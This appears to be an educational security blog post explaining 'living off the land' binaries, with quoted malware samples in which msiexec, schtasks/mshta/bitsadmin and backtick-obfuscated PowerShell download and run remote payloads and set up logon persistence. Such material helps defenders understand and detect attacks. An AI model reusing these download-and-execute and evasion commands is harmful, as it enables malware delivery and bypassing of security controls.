What is a LOLBIN?
To me, the phrase ‘Attackers Living off the Land’ evokes imagery of a foreign army sacking and plundering the countryside. Like Attila the Huns’ destructive campaign through Gaul in 451CE. During this destructive campaign, Attila had pillaged much of medieval Gaul, before withdrawing back to his homeland after the Battle of the Catalaunian Plains.
In the context of computer security, however, Living off the Land, is somewhat less dramatic.
This is when an attacker uses legitimate software and tools for malicious purposes. Such as tools that are built into a Microsoft Windows computer. Thus the term LOLBIN (Living Off the Land Binary) is used to describe a specific tool. This term has also been extended to LOLBAS (Living Off the Land Binaries And Scripts).
The phrase has been attributed to Christopher Campbell and Matthew Graeber in this BSides talk which describes how the use of built-in tools can defeat defensive countermeasures, such as antivirus and application whitelisting tools.
The LOLBAS project has spawned out of an effort to document every such tool which can be used by attackers for Living off the Land.
Let's look at some examples.
LOLBIN Example: msiexec
In the first example, we will look at a MITRE ATT&CK technique called Proxy Execution. An attacker or malware might use this technique to run an executable file that would otherwise have been blocked by antivirus (AV).
The LOLBIN in this example is a Microsoft tool msiexec which provides the means to install software from the command line. An example of the normal usage of this tool looks like this:
msiexec.exe /i “C:\example.msi”
An example of malicious usage is seen in this trojan sample:
msiexec.exe /i hxxps://deripaskavinpelcom.com/Sfgrdhytui/Launch4j.msi /qn
In this example we can see:
- The msiexec tool both downloads and executes a malicious payload.
- The attacker is attempting to bypass AV by avoiding writing a malicious file to disk.
- The attacker is attempting to bypass application control and whitelisting systems, by proxying the execution of the malicious payload using msiexec.
Another Example: schtasks, mshta, bitsadmin
Windows Scheduled Tasks are popular amongst malware authors for achieving persistence and executing secondary payloads.
Here is an example where a creative malware author is using a scheduled task to execute a script which then downloads a file:
schtasks.exe /create /f /sc onlogon /rl highest /tn \”Windows Services 44\” /tr \”mshta.exe vbscript:CreateObject(‘WScript.Shell’).Run(‘cmd /c bitsadmin /transfer 22130 hxxp://l0lz.co/System.dll %APPDATA%\\Microsoft\\System.dll & %APPDATA%\\Microsoft\\System.dll & exit’,0)(Window.Close)\”
In this example we can see:
- The attacker is creating a Scheduled Task using schtasks.exe to execute on logon.
- The Task will invoke the mshta.exe LOLBIN to proxy execute an inline VBScript.
- The VBScript then invokes the Windows bitsadmin (Background Intelligent Transfer Services) tool to download a secondary malicious file from the aptly-named ‘l0lz.co’ domain. This tool is commonly used for software updates but is also used by attackers to transfer files.
A Final Example: PowerShell
Powershell has proven to be a favourite amongst malware authors and threat actor groups. This is because it is widely available and quite powerful.
Here is a sample of ‘Lemon Duck’ cryptocurrency mining malware launching PowerShell.exe to download a secondary payload:
powershell.exe -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(‘hxxp://t.z'+'er9g.com/7p.php?0.7*mail_js*ZKx33m2*bwI27OnXZP*'+[Environment]::OSVersion.version.Major);bpu (‘hxxp://t.z'+'er9g.com/mail.jsp?js_0.7')
The attackers are using backtick character (`) to attempt to bypass inspection mechanisms which could be monitoring for the string ‘New-Object Net.WebClient’.
Conclusion
LOLBINs are built-in tools that threat actors and malware will use to attempt to avoid detection and bypass common security controls.
Further Watching
DerbyCon 2018 ‘LOLBins Nothing to LOL about’ - Oddvar Moe: https://youtu.be/NiYTdmZ8GR4
BSidesAugusta 2013 ‘Living Off the Land’ - Christopher Campbell and Matthew Graeber: https://youtu.be/1R_2LnX8uVg